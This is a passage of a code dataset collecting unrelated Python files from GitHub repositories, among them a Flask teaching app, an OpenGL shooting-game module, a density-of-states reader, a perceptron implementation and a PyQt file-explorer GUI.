setup_logger(name=\"fvcore\")\n logger = setup_logger()\n logger.info(\"Arguments: \" + str(args))\n\n cfg = setup_cfg(args)\n\n demo = VisualizationDemo(cfg)\n\n if args.input:\n if len(args.input) == 1:\n args.input = glob.glob(os.path.expanduser(args.input[0]))\n assert args.input, \"The input path(s) was not found\"\n for path in tqdm.tqdm(args.input, disable=not args.output):\n # use PIL, to be consistent with evaluation\n img = read_image(path, format=\"BGR\")\n start_time = time.time()\n mask_pred_results, cls_score = demo.get_mask_embedding(img)\n cls_idx = cls_score.argmax(dim=-1).squeeze()\n # cls_score = cls_score / cls_score.norm(dim=-1, keepdim=True)\n\n \n import torch\n import torchvision\n from torch.nn import functional as F\n from PIL import Image\n \n mask_pred_results = F.interpolate(\n mask_pred_results,\n size=(img.shape[0], img.shape[1]),\n mode=\"bilinear\",\n align_corners=False,\n ).cpu()\n \n mask_results = torch.where(mask_pred_results > 0.5, torch.tensor([1.]), torch.tensor([0.]))\n trans = torchvision.transforms.Lambda(lambda x: x.repeat(3, 1, 1) if x.size(0)==1 else x)\n \n img = torchvision.transforms.ToTensor()(img.copy())\n alpha = 0.5\n # for i in range(100):\n # # confidence = cls_score[0,i,:].max(dim=-1)[0].sigmoid().item()\n # confidence = logits_per_image[i,:].max(dim=-1)[0].sigmoid().item()\n # # if confidence <= 0.5: ## confidence score 0.5 초과만 visualization\n # # continue\n # mask_result = trans(mask_results[:,i,...])\n # blended = alpha*mask_result + (1-alpha)*img\n \n # print(\"image_path: \", path)\n # # print(class_names['pascal'][cls_score[0,i,:].argmax(dim=-1)])\n # print(class_names['pascal'][logits_per_image[i,:].argmax(dim=-1)])\n # 
print(\"confidence: \", confidence)\n # plt.imshow(blended.permute(1,2,0))\n # plt.show()\n \n ## Check all masks at once\n for i in range(100):\n mask_result = trans(mask_results[:,i,...])\n if i == 0 :\n blended = mask_result\n else:\n blended += mask_result\n \n print(\"image_path: \", path)\n print(class_names['pascal'][cls_idx[i]])\n print(\"confidence: \", confidence)\n # plt.imshow(blended.permute(1,2,0))\n # plt.show()\n","repo_name":"ksos104/ZS3","sub_path":"demo/demo_mask_vis.py","file_name":"demo_mask_vis.py","file_ext":"py","file_size_in_byte":6542,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"25237796003","text":"from flask import Flask, redirect, render_template, request\nfrom weather import get_temp\n\napp = Flask(__name__) # an instance of Flask\n\n\n# If the website domain is www.xyz.com, http://www.xyz.com/ will trigger the function below\n# @app.route(\"/\")\n# def index():\n# return \"

    Hello, World!

    \"\n\n\n# If the website domain is www.xyz.com, http://www.xyz.com/hello and http://www.xyz.com/hello/ will trigger the function below\n@app.route(\"/\")\n@app.route(\"/hello/\")\n@app.route(\"/hello/\")\ndef hello(name=None):\n if name:\n return render_template(\"hello.html\", username=name)\n return render_template(\"hello.html\")\n\n\n# Create another route like '/square/', so the web app will display the square of the number\n@app.route(\"/square/\")\ndef square(num=None):\n if num:\n result = float(num) ** 2\n return f\"The square of {num} is {result}.\"\n return \"You need to provide a number.\"\n\n\n@app.errorhandler(404)\ndef page_not_found(e):\n return render_template(\"404.html\")\n\n\n# @app.route(\"/weather/\", methods=[\"GET\", \"POST\"])\n# def get_weather():\n# if request.method == \"POST\":\n# city_name = request.form.get(\"city\")\n# temp = get_temp(city_name)\n# return f\"The current temprature at the city {city_name} is {temp}.\"\n# else:\n# return render_template(\"weather-form.html\")\n\n\n@app.get(\"/weather/\")\ndef weather_get():\n return render_template(\"weather-form.html\")\n\n\n@app.post(\"/weather/\")\ndef weather_post():\n city_name = request.form.get(\"city\")\n temp = get_temp(city_name)\n return f\"The current temprature at the city {city_name} is {temp}.\"\n\n\nSTUDENTS = {}\nCOURSES = [\"Python\", \"Web\", \"Cybercurity\", \"Mobile App\"]\n\n\n@app.route(\"/students/\")\ndef show_students():\n return render_template(\"students.html\", students=STUDENTS)\n\n\n@app.get(\"/register/\")\ndef register_get():\n return render_template(\"register-form.html\", courses=COURSES)\n\n\n@app.post(\"/register/\")\ndef register_post():\n # validate name course\n name = request.form.get(\"name\")\n course = request.form.get(\"course\")\n if course not in COURSES:\n return \"Hi hacker, you cannot register this course!\"\n STUDENTS[name] = course\n # return \"Successfullly registered.\"\n return redirect(\"/students/\")\n\n\nif __name__ == \"__main__\":\n app.run(debug=True)\n","repo_name":"OIM3640/oim3640","sub_path":"hello-flask/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2321,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"19342660970","text":"\"\"\"Retrieves the WA residents of a region\"\"\"\n\nimport argparse\nimport logging\nimport sys\nimport typing as t\nfrom typing import Collection, Iterable\n\nimport config\nimport nsapi\n\n# Set logging level\nlevel = logging.WARNING\n# Name logger\nlogger = logging.getLogger()\n# Configure loggers\nnsapi.configure_logger(logger, level=level)\nnsapi.configure_logger(nsapi.logger, level=level)\n\n\ndef residents(requester: nsapi.NSRequester, region: str) -> Collection[str]:\n \"\"\"Retrieves the WA residents of the given region.\"\"\"\n\n # Retrieve residents\n return set(requester.region(region).nations()) & set(\n requester.wa().shard(\"members\").split(\",\")\n )\n\n\ndef nation_url(nation: str) -> str:\n \"\"\"Format a nation into a URL.\"\"\"\n\n return f\"https://www.nationstates.net/nation={nsapi.clean_format(nation)}\"\n\n\ndef listNationCodes(nations: Iterable[str]) -> str:\n \"\"\"Returns a string containing the given nations formmatted into nscode links,\n conjoined into a single line.\n \"\"\"\n\n return \"\".join(f\"[nation]{nation}[/nation]\" for nation in nations)\n\n\ndef low_endorsements(\n requester: nsapi.NSRequester, region: str, count: int = 20\n) -> Collection[str]:\n \"\"\"\n Finds nations with low endorsements.\n\n 
Searches the nation dump for WA nations in the specified region\n with less endorsements than the given count.\n \"\"\"\n\n filtered = []\n\n # Squash casing on region\n lower_region = region.lower()\n\n # Search for matching nations\n for nation in requester.dumpManager().nations():\n if (\n # Compare regions, case insensitive\n nation.region.lower() == lower_region\n # Check that in WA\n and nation.WAStatus.startswith(\"WA\")\n # Check that endorsements are under the specified level\n and len(nation.endorsements) <= count\n ):\n # Save to return at end of search\n filtered.append(nation.name)\n\n return filtered\n\n\ndef main() -> None:\n \"\"\"Main function, mainly for testing purposes.\"\"\"\n\n parser = argparse.ArgumentParser(\n description=\"Collects various information on WA residents of a region.\"\n )\n\n parser.add_argument(\"region\", help=\"Region to search.\")\n\n parser.add_argument(\n \"-c\",\n \"--count\",\n help=\"Only collect residents with less endorsements than this.\",\n type=int,\n default=None,\n )\n\n parser.add_argument(\n \"-o\", \"--output\", help=\"File name to output to instead of stdout.\", default=None\n )\n\n parser.add_argument(\n \"-f\",\n \"--format\",\n choices=[\"raw\", \"url\", \"bbcode\"],\n default=\"bbcode\",\n help=\"How to format the output.\",\n )\n\n # Parse args\n # Check sys.argv first; if no args provided run interactive mode\n region: str\n count: t.Optional[int]\n output: t.Optional[str]\n form: str\n if len(sys.argv) <= 1:\n # Interactive mode\n region = input(\"Region to search: \")\n count_raw = input(\"Endorsement boundary (type nothing to get all WA): \")\n if count_raw:\n count = int(count_raw)\n else:\n count = None\n output = input(\"File name to output to: \")\n form = \"bbcode\"\n else:\n args = parser.parse_args()\n region = args.region\n count = args.count\n output = args.output\n form = args.format\n\n # Setup requester\n requester = nsapi.NSRequester(config.userAgent)\n\n # Use api if getting all residents\n if not count:\n nations = residents(requester, region)\n # Use dump if filtering\n else:\n nations = low_endorsements(requester, region, count)\n\n output_block: str\n if form == \"url\":\n output_block = \"\\n\".join(map(nation_url, nations))\n elif form == \"bbcode\":\n output_block = listNationCodes(nations)\n else:\n output_block = \"\\n\".join(nations)\n\n if output:\n with open(output, \"w\", encoding=\"utf-8\") as out_file:\n print(output_block, file=out_file)\n else:\n print(output_block)\n\n\n# Call main if this script is the entrypoint\nif __name__ == \"__main__\":\n main()\n","repo_name":"HN67/nsapi","sub_path":"wa/waresidents.py","file_name":"waresidents.py","file_ext":"py","file_size_in_byte":4121,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"35"} +{"seq_id":"4458920588","text":"import numpy as np\nimport pygame as pg\nfrom pyrr import Matrix44\nfrom math import radians\nfrom OpenGL.GL import *\nfrom OpenGL.GLUT import *\nfrom helpingFunctions import *\n\nclass Shape:\n def __init__(self, vertices, material, shader, FormatAlign=['in_position'], Format=['3 0'], stride=3, **kargs):\n self.kargs = kargs\n self.material = material\n self.vertices = np.array(vertices, dtype=np.float32)\n self.shader = shader\n self.transform = Matrix44.identity(dtype=np.float32)\n self.scalingFactor = 0.01 if not 'scalingFactor' in self.kargs else self.kargs['scalingFactor']\n self.translated = [0,0,0] if not 'translated' in self.kargs else self.kargs['translated']\n self.FormatAlign 
= FormatAlign\n self.Format = Format\n self.stride = stride\n self.vao = None\n self.vbo = None\n self.VertxPos = 0 if not 'xpos' in self.kargs else self.kargs['xpos']\n self.VertyPos = self.VertxPos+1 if not 'ypos' in self.kargs else self.kargs['ypos']\n self.VertzPos = self.VertyPos+1 if not 'zpos' in self.kargs else self.kargs['zpos']\n self.name = 'Shape'\n self.initBuffer()\n\n def initBuffer(self):\n self.vao = glGenVertexArrays(1) if not self.vao else self.vao\n glBindVertexArray(self.vao)\n\n self.vbo = glGenBuffers(1) if not self.vbo else self.vbo\n glBindBuffer(GL_ARRAY_BUFFER, self.vbo)\n glBufferData(GL_ARRAY_BUFFER, self.vertices.nbytes, self.vertices, GL_STATIC_DRAW)\n\n for i, ele in enumerate(self.Format):\n vl = ele.split()\n pos = glGetAttribLocation(self.shader.shader_program, self.FormatAlign[i])\n glVertexAttribPointer(pos, int(vl[0]), GL_FLOAT, GL_FALSE, self.stride*4, ctypes.c_void_p(int(vl[1])*4))\n glEnableVertexAttribArray(pos)\n\n def getModelMatrix(self):\n self.rotate(0 if not 'rotatex' in self.kargs else (self.kargs['rotatex']),\n 0 if not 'rotatey' in self.kargs else (self.kargs['rotatey']),\n 0 if not 'rotatez' in self.kargs else (self.kargs['rotatez']))\n self.translate(0 if not 'translatex' in self.kargs else self.kargs['translatex'],\n 0 if not 'translatey' in self.kargs else self.kargs['translatey'],\n 0 if not 'translatez' in self.kargs else self.kargs['translatez'])\n self.scale(1 if not 'scalex' in self.kargs else self.kargs['scalex'],\n 1 if not 'scaley' in self.kargs else self.kargs['scaley'],\n 1 if not 'scalez' in self.kargs else self.kargs['scalez'])\n return self.transform \n\n def translate(self, x=0, y=0, z=0):\n self.transform = Matrix44.from_translation(\n [x, y, z], dtype=np.float32) @ self.transform\n\n def rotate(self, x=0, y=0, z=0, rotateMat = None, offset=0):\n self.translate(*(np.array(self.translated)+offset))\n self.transform = np.array(rotateMat, dtype=np.float32) if rotateMat!=None else Matrix44.from_eulers([radians(x), \n radians(y), \n radians(z)], \n dtype=np.float32) @ self.transform\n self.translate(*list(map(lambda a: -a, np.array(self.translated)+offset)))\n\n def scale(self, x=1, y=1, z=1):\n self.transform = Matrix44.from_scale([x, y, z], dtype=np.float32) @ self.transform\n \n def translateVert(self, x=0, y=0, z=0):\n self.vertices = np.array(list(map(lambda a: [ *a[:self.VertxPos], a[self.VertxPos] + x, a[self.VertyPos] + y, a[self.VertzPos] + z, *a[self.VertzPos+1:]], self.vertices)), dtype=np.float32)\n self.initBuffer()\n\n def getRotationMatrix(self, x, y, z):\n Rx = np.array([ [1, 0, 0],\n [0, np.cos(x), -np.sin(x)],\n [0, -np.sin(x), np.cos(x)]])\n Ry = np.array([ [np.cos(y), 0, np.sin(y)],\n [ 0, 1, 0],\n [np.sin(y), 0, np.cos(y)]])\n Rz = np.array([ [np.cos(z), -np.sin(z), 0],\n [-np.sin(z), np.cos(z), 0],\n [ 0, 0, 1]])\n combined = np.array(np.dot(Rx, np.dot(Ry, Rz)))\n return combined\n\n def rotateVert(self, x=0, y=0, z=0):\n self.translateVert(*self.translated)\n x,y,z = radians(x), radians(y), radians(z)\n combined = self.getRotationMatrix(x,y,z)\n self.vertices = np.array(list(map(lambda a: [ *a[:self.VertxPos], *np.dot([a[self.VertxPos], a[self.VertyPos], a[self.VertzPos]], combined), *a[self.VertzPos+1:]], self.vertices)))\n self.translateVert(*list(map(lambda a: -a, self.translated)))\n\n def scaleVert(self, x=1, y=1, z=1):\n self.vertices = np.array(list(map(lambda a: [ *a[:self.VertxPos], float(a[self.VertxPos]) * x, float(a[self.VertyPos]) * y, float(a[self.VertzPos]) * z, *a[self.VertzPos+1:]], 
self.vertices)), dtype=np.float32)\n self.initBuffer()\n\n def destroy(self):\n self.shader.destroy()\n self.material.destroy()\n glDeleteBuffers(1, [self.vbo])\n glDeleteVertexArrays(1, [self.vao])\n\nclass Gun(Shape):\n def __init__(self, vertices, material, shader, FormatAlign=['in_position'], Format=['3 0'], stride=3, bulletParams=[None, None], pos=[0,-0.3,3.5], front=[0,0,-1], **kargs):\n super().__init__(vertices, material, shader, FormatAlign, Format, stride, **kargs)\n self.mouse_sensitivity = 0.005\n self.posMotion = 0.08\n self.frontMotion = 0.02\n self.bullets = []\n self.pos = pos\n self.initialPos = pos\n self.front = front\n self.up = [0,1,0]\n self.bulletMat, self.bulletShader = bulletParams \n self.name = 'Gun'\n \n def fire(self):\n new_bullet = Bullet(self.pos, self.front, self.bulletMat, self.bulletShader)\n self.bullets.append(new_bullet)\n\n def getModelMatrix(self):\n self.move()\n return super().getModelMatrix()\n\n def move(self):\n mouse_dx, mouse_dy = pg.mouse.get_rel()\n x = mouse_dx * self.mouse_sensitivity\n y = mouse_dy * self.mouse_sensitivity\n self.rotate(y, x, offset=np.array([0,0,0.1]))\n self.pos[0] += x* self.posMotion\n self.pos[1] -= y* self.posMotion\n bullet_offsetx = 0.03\n bullet_offsety = 0.1 \n self.pos = [self.initialPos[0]+self.pos[0]*bullet_offsetx, \n self.initialPos[1]+(self.pos[1]*bullet_offsety), \n self.pos[2]]\n self.front = np.dot(self.front, self.getRotationMatrix(-y* self.frontMotion,\n x* self.frontMotion*0.5,\n 0))\n\n def destroy(self):\n super().destroy()\n for b in self.bullets:\n b.destroy()\n\nclass Target(Shape):\n def __init__(self, vertices, material, shader, FormatAlign=['in_position'], Format=['3 0'], stride=3, **kargs):\n super().__init__(vertices, material, shader, FormatAlign, Format, stride, **kargs)\n\nclass Bullet(Shape):\n def __init__(self, position, direction, material, shader):\n scale = 0.02\n self.vertices = ScaleObjectVertices(getCombinedVertices(getBulletVertices(), getBulletIndices(), [0.9,0.8,0.4]*18), scale, scale, scale) \n self.vertices = shiftObjectVertices(self.vertices, *position) \n super().__init__(self.vertices, material, shader, ['in_position', 'in_color'], ['3 0', '3 3'], 6, xpos = 0)\n self.direction = np.array(direction, dtype=np.float32)\n self.speed = 0.1\n self.name='bullet'\n\n def move(self):\n if not (self.vertices[0][2]<-3.6):\n self.translateVert(*self.direction * self.speed)\n","repo_name":"M-Usman-Tahir/OpenGL-Python-Mini-Course","sub_path":"Project/Shape.py","file_name":"Shape.py","file_ext":"py","file_size_in_byte":8014,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"37822987868","text":"from aimstools.misc import *\nfrom aimstools.density_of_states.base import DOSBaseClass\nfrom aimstools.density_of_states.total_dos import TotalDOS\nfrom aimstools.density_of_states.species_proj_dos import SpeciesProjectedDOS\nfrom aimstools.density_of_states.utilities import DOSSpectrum\n\nimport numpy as np\nimport re\n\n\nclass AtomProjectedDOS(SpeciesProjectedDOS, TotalDOS, DOSBaseClass):\n def __init__(self, outputfile, soc=False) -> None:\n DOSBaseClass.__init__(self, outputfile)\n assert any(\n x\n in [\n \"atom-projected dos\",\n \"atom-projected dos tetrahedron\",\n \"species-projected dos\",\n \"species-projected dos tetrahedron\",\n ]\n for x in self.tasks\n ), \"Atom-projected DOS was not specified as task in control.in .\"\n self.soc = soc\n self.spin = \"none\" if self.control[\"spin\"] != \"collinear\" else 
\"collinear\"\n self._spectrum = self.set_spectrum(None)\n\n def __repr__(self):\n return \"{}(outputfile={}, spin_orbit_coupling={})\".format(\n self.__class__.__name__, repr(self.outputfile), self.soc\n )\n\n def _read_dosfiles(self):\n if self.spin == \"none\":\n dosfiles = self.get_dos_files(soc=self.soc, spin=\"none\").atom_proj_dos\n dosfiles = list(zip(dosfiles, dosfiles))\n if self.spin == \"collinear\":\n dosfiles_dn = self.get_dos_files(soc=self.soc, spin=\"dn\").atom_proj_dos\n dosfiles_up = self.get_dos_files(soc=self.soc, spin=\"up\").atom_proj_dos\n dosfiles = list(zip(dosfiles_dn, dosfiles_up))\n dos_per_atom = []\n energies = []\n nspins = 2 if self.spin == \"collinear\" else 1\n for i, atom in enumerate(self.structure):\n symbol = atom.symbol\n index = i + 1\n pattern = re.compile(r\".*\" + symbol + \"{0:04d}\".format(index) + r\".*\")\n energies = []\n contributions = []\n for s in range(nspins):\n atom_file = [k[s] for k in dosfiles if re.search(pattern, str(k[s]))]\n assert (\n len(atom_file) == 1\n ), \"Multiple atom-projected dos files found for same atom. Something must have gone wrong. Found: {}\".format(\n atom_file\n )\n array = np.loadtxt(atom_file[0], dtype=float, comments=\"#\")\n ev, co = array[:, 0], array[:, 1:]\n # This ensures that all arrays have shape (nenergies, 7)\n nrows, ncols = co.shape\n array = np.zeros((nrows, 7))\n array[:, :ncols] = co\n energies.append(ev)\n contributions.append(array)\n energies = np.stack(energies, axis=1)\n contributions = np.stack(contributions, axis=1)\n dos_per_atom.append((i, contributions))\n self._dos = (energies, dos_per_atom)\n\n def set_spectrum(self, reference=None):\n if self.dos == None:\n self._read_dosfiles()\n energies, dos_per_atom = self.dos\n self.set_energy_reference(reference, self.soc)\n fermi_level = self.fermi_level.soc if self.soc else self.fermi_level.scalar\n reference, shift = self.energy_reference\n band_extrema = self.band_extrema[:2] if not self.soc else self.band_extrema[2:]\n atoms = self.structure.atoms\n self._spectrum = DOSSpectrum(\n atoms=atoms,\n energies=energies,\n contributions=dos_per_atom,\n type=\"atom\",\n fermi_level=fermi_level,\n reference=reference,\n band_extrema=band_extrema,\n shift=shift,\n )\n\n @property\n def spectrum(self):\n \":class:`aimstools.density_of_states.utilities.DOSSpectrum`.\"\n if self._spectrum == None:\n self.set_spectrum(None)\n return self._spectrum\n","repo_name":"romankempt/aimstools","sub_path":"aimstools/density_of_states/atom_proj_dos.py","file_name":"atom_proj_dos.py","file_ext":"py","file_size_in_byte":3929,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"35"} +{"seq_id":"70927157220","text":"# Averaged Perceptron\n\nimport numpy as np\n\ndef positive(x, th, th0):\n return np.sign(th.T@x + th0)\n\ndef averaged_perceptron(data, labels, params = {}, hook = None):\n\n T = params.get('T', 100)\n (d, n) = data.shape\n\n theta = np.zeros((d, 1))\n theta_0 = np.zeros((1, 1))\n theta_s = np.zeros((d, 1))\n theta_0s = np.zeros((1, 1))\n for t in range(T):\n for i in range(n):\n x = data[:,i:i+1]\n y = labels[:,i:i+1]\n if y * positive(x, theta, theta_0) <= 0.0:\n theta = theta + y * x\n theta_0 = theta_0 + y\n theta_s += theta\n theta_0s += theta_0\n return theta_s/(n*T), theta_0s/(n*T)\n\n\n# Evaluating a classifier\n\ndef eval_classifier(learner, data_train, labels_train, data_test, labels_test):\n theta, theta_0 = learner(data_train, labels_train)\n #return score(data_test, labels_test, theta, 
theta_0)\n\n\n# Evaluating algorithm\ndef eval_learning_alg(learner, data_gen, n_train, n_test, it):\n\n train_data, train_labels = data_gen(n_train)\n score = 0\n\n for i in range(it):\n test_data, test_labels = data_gen(n_test)\n score += eval_classifier(learner, train_data, train_labels, test_data, test_labels)\n\n return score / it\n\n# Cross validation\ndef xval_learning_alg(learner, data, labels, k):\n s_data = np.array_split(data, k, axis=1)\n s_labels = np.array_split(labels, k, axis=1)\n\n score_sum = 0\n for i in range(k):\n data_train = np.concatenate(s_data[:i] + s_data[i+1:], axis=1)\n labels_train = np.concatenate(s_labels[:i] + s_labels[i+1:], axis=1)\n data_test = np.array(s_data[i])\n labels_test = np.array(s_labels[i])\n score_sum += eval_classifier(learner, data_train, labels_train,\n data_test, labels_test)\n return score_sum/k","repo_name":"KarlsonAV/MIT_ML_COURSE","sub_path":"perceptron.py","file_name":"perceptron.py","file_ext":"py","file_size_in_byte":1855,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"39706999220","text":"from pyramid.response import Response\nfrom pyramid.view import view_config, view_defaults\nfrom sqlalchemy.exc import IntegrityError\n\nfrom ..models import Product\n\n@view_defaults(renderer='json', route_name='product_collection')\nclass ProductCollectionView(object):\n\tdef __init__(self, request):\n\t\tself.request = request\n\n\t@view_config(request_method='GET')\n\tdef get_all(self):\n\t\trequest = self.request\n\t\treturn request.dbsession.query(Product).all()\n\n\n\t@view_config(request_method='POST')\n\tdef create(self):\n\t\ttry:\n\t\t\trequest = self.request;\n\t\t\tproduct = Product(**request.json_body)\n\t\t\t\n\t\t\trequest.dbsession.add(product)\n\t\t\trequest.dbsession.flush()\n\t\t\trequest.response.status = 201\n\t\t\treturn product\n\t\texcept IntegrityError as error:\n\t\t\tprint(error)\n\t\t\trequest.response.status = 400\n\t\t\treturn {'message' : 'Invalid parameters'}\n\n\n@view_defaults(renderer='json', route_name='product')\nclass ProductView(object):\n\tdef __init__(self, request):\n\t\tself.request = request\n\t\tproduct_id = int(request.matchdict['id'])\n\t\tself.product = request.dbsession.query(Product).get(product_id)\n\n\t@view_config(request_method='GET')\n\tdef get_by_id(self):\n\t\tproduct = self.product\n\t\tif product is not None:\t\n\t\t\treturn product\n\t\telse:\n\t\t\trequest.response.status = 404\n\t\t\treturn {'message' : 'Product not found'}\n\n\t# add put/delete\n","repo_name":"y0devv/labela-proef","sub_path":"labela_proef/views/product.py","file_name":"product.py","file_ext":"py","file_size_in_byte":1311,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"30078120129","text":"import json\r\nfrom json import JSONEncoder\r\n\r\n\r\nclass Vehicle:\r\n def __init__(self, name, engine, price):\r\n self.name = name\r\n self.engine = engine\r\n self.price = price\r\n\r\n\r\nclass VehicleEncoder(JSONEncoder):\r\n def default(self, o):\r\n return o.__dict__\r\n\r\n\r\nvehicle = Vehicle(\"Toyota\", \"30.5L\", 32000)\r\n\r\nprint(\"Encode Vehicle Object into JSON\")\r\nvehicleJson = json.dumps(vehicle, indent=4, cls=VehicleEncoder)\r\nprint(vehicleJson)\r\n","repo_name":"yogiibsw/100_Day_Of_Code","sub_path":"Day_29/code.py","file_name":"code.py","file_ext":"py","file_size_in_byte":465,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"35"} 
+{"seq_id":"20751855038","text":"from PyQt5 import QtCore, QtGui, QtWidgets\nfrom PyQt5.QtWidgets import *\nfrom PyQt5.QtCore import *\nfrom PyQt5.QtGui import *\nfrom PyQt5.Qt import QKeySequence, QCursor, QDesktopServices\nimport os, shutil\n\n\nclass Ui_MainWindow(object):\n def setupUi(self, MainWindow):\n MainWindow.setObjectName(\"MainWindow\")\n MainWindow.resize(1112, 896)\n\n self.centralwidget = QtWidgets.QWidget(MainWindow)\n self.centralwidget.setObjectName(\"centralwidget\")\n\n self.leftPane = QtWidgets.QTreeView(self.centralwidget)\n self.leftPane.setGeometry(QtCore.QRect(10, 180, 301, 651))\n self.leftPane.setObjectName(\"leftPane\")\n \n self.mainArea = QtWidgets.QTableView(self.centralwidget)\n self.mainArea.setGeometry(QtCore.QRect(320, 180, 781, 651))\n self.mainArea.setObjectName(\"mainArea\")\n self.mainArea.setShowGrid(False)\n \n self.frame = QtWidgets.QFrame(self.centralwidget)\n self.frame.setGeometry(QtCore.QRect(10, 10, 1091, 161))\n self.frame.setFrameShape(QtWidgets.QFrame.StyledPanel)\n self.frame.setFrameShadow(QtWidgets.QFrame.Raised)\n self.frame.setObjectName(\"frame\")\n self.frame.setStyleSheet(\"background: white;\")\n \n self.dark_Button = QtWidgets.QToolButton(self.frame)\n self.dark_Button.setGeometry(QtCore.QRect(10, 120, 51, 41))\n icon8 = QtGui.QIcon()\n icon8.addPixmap(QtGui.QPixmap(\":/icons/icons8-moon-and-stars-50.png\"), QtGui.QIcon.Normal, QtGui.QIcon.Off)\n self.dark_Button.setIcon(icon8)\n self.dark_Button.setIconSize(QtCore.QSize(50, 50))\n self.dark_Button.setObjectName(\"darkButton\")\n self.dark_Button.setStyleSheet(\"border: none;\")\n self.dark_Button.clicked.connect(self.darkMode)\n\n self.back_button = QtWidgets.QToolButton(self.frame)\n self.back_button.setGeometry(QtCore.QRect(70, 120, 51, 41))\n self.back_button.setStyleSheet(\"border: none;\")\n icon = QtGui.QIcon()\n icon.addPixmap(QtGui.QPixmap(\":/icons/icons8-arrow-pointing-left-64.png\"), QtGui.QIcon.Normal, QtGui.QIcon.Off)\n self.back_button.setIcon(icon)\n self.back_button.setIconSize(QtCore.QSize(30, 30))\n self.back_button.setObjectName(\"back_button\")\n self.back_button.clicked.connect(self.go_back) \n \n self.next_button = QtWidgets.QToolButton(self.frame)\n self.next_button.setGeometry(QtCore.QRect(120, 120, 51, 41))\n self.next_button.setStyleSheet(\"border: none;\")\n icon1 = QtGui.QIcon()\n icon1.addPixmap(QtGui.QPixmap(\":/icons/icons8-arrow-64.png\"), QtGui.QIcon.Normal, QtGui.QIcon.Off)\n self.next_button.setIcon(icon1)\n self.next_button.setIconSize(QtCore.QSize(30, 30))\n self.next_button.setObjectName(\"next_button\")\n self.next_button.clicked.connect(self.go_next)\n\n self.prev_button = QtWidgets.QToolButton(self.frame)\n self.prev_button.setGeometry(QtCore.QRect(180, 120, 51, 41))\n self.prev_button.setStyleSheet(\"border: none;\")\n icon2 = QtGui.QIcon()\n icon2.addPixmap(QtGui.QPixmap(\":/icons/icons8-send-letter-48 (1).png\"), QtGui.QIcon.Normal, QtGui.QIcon.Off)\n self.prev_button.setIcon(icon2)\n self.prev_button.setIconSize(QtCore.QSize(40, 40))\n self.prev_button.setObjectName(\"prev_button\")\n self.prev_button.clicked.connect(self.move_prev)\n \n self.path_label = QtWidgets.QLabel(self.frame)\n self.path_label.setGeometry(QtCore.QRect(260, 127, 47, 31))\n self.path_label.setStyleSheet(\"font-size: 15px; font-family: Bahnschrift SemiBold;\")\n self.path_label.setObjectName(\"path_label\") \n\n self.path = QtWidgets.QTextBrowser(self.frame)\n self.path.setGeometry(QtCore.QRect(310, 130, 781, 31))\n self.path.setObjectName(\"path\")\n \n 
self.newFolder_button = QtWidgets.QToolButton(self.frame)\n self.newFolder_button.setGeometry(QtCore.QRect(20, 0, 91, 81))\n self.newFolder_button.setStyleSheet(\"border: none;\")\n self.newFolder_button.setText(\"\")\n icon3 = QtGui.QIcon()\n icon3.addPixmap(QtGui.QPixmap(\":/icons/icons8-folder-80.png\"), QtGui.QIcon.Normal, QtGui.QIcon.Off)\n self.newFolder_button.setIcon(icon3)\n self.newFolder_button.setIconSize(QtCore.QSize(60, 60))\n self.newFolder_button.setObjectName(\"newFolder_button\")\n self.newFolder_button.clicked.connect(self.newFolder)\n \n self.newFolder_label = QtWidgets.QLabel(self.frame)\n self.newFolder_label.setGeometry(QtCore.QRect(26, 80, 81, 21))\n self.newFolder_label.setStyleSheet(\"font-size: 15px; font-family: forte;\")\n self.newFolder_label.setObjectName(\"newFolder_label\")\n \n self.delete_button = QtWidgets.QToolButton(self.frame)\n self.delete_button.setGeometry(QtCore.QRect(130, 0, 101, 91))\n self.delete_button.setStyleSheet(\"border: none;\")\n self.delete_button.setText(\"\")\n icon4 = QtGui.QIcon()\n icon4.addPixmap(QtGui.QPixmap(\":/icons/icons8-full-recycle-bin-240.png\"), QtGui.QIcon.Normal, QtGui.QIcon.Off)\n self.delete_button.setIcon(icon4)\n self.delete_button.setIconSize(QtCore.QSize(60, 60))\n self.delete_button.setObjectName(\"delete_button\")\n self.delete_button.clicked.connect(self.deleteFileFolder)\n\n self.cut_button = QtWidgets.QToolButton(self.frame)\n self.cut_button.setGeometry(QtCore.QRect(230, 0, 101, 91))\n self.cut_button.setStyleSheet(\"border: none;\")\n self.cut_button.setText(\"\")\n icon5 = QtGui.QIcon()\n icon5.addPixmap(QtGui.QPixmap(\":/icons/icons8-cut-40.png\"), QtGui.QIcon.Normal, QtGui.QIcon.Off)\n self.cut_button.setIcon(icon5)\n self.cut_button.setIconSize(QtCore.QSize(60, 60))\n self.cut_button.setObjectName(\"cut_button\")\n self.cut_button.clicked.connect(self.cut)\n \n self.copy_button = QtWidgets.QToolButton(self.frame)\n self.copy_button.setGeometry(QtCore.QRect(330, 0, 111, 101))\n self.copy_button.setStyleSheet(\"border: none;\")\n self.copy_button.setText(\"\")\n icon6 = QtGui.QIcon()\n icon6.addPixmap(QtGui.QPixmap(\":/icons/icons8-copy-144.png\"), QtGui.QIcon.Normal, QtGui.QIcon.Off)\n self.copy_button.setIcon(icon6)\n self.copy_button.setIconSize(QtCore.QSize(60, 60))\n self.copy_button.setObjectName(\"copy_button\")\n self.copy_button.clicked.connect(self.copy)\n \n self.paste_button = QtWidgets.QToolButton(self.frame)\n self.paste_button.setGeometry(QtCore.QRect(440, 0, 101, 91))\n self.paste_button.setStyleSheet(\"border: none;\")\n self.paste_button.setText(\"\")\n icon7 = QtGui.QIcon()\n icon7.addPixmap(QtGui.QPixmap(\":/icons/icons8-paste-48.png\"), QtGui.QIcon.Normal, QtGui.QIcon.Off)\n self.paste_button.setIcon(icon7)\n self.paste_button.setIconSize(QtCore.QSize(60, 60))\n self.paste_button.setObjectName(\"paste_button\")\n self.paste_button.clicked.connect(self.paste)\n \n self.delete_label = 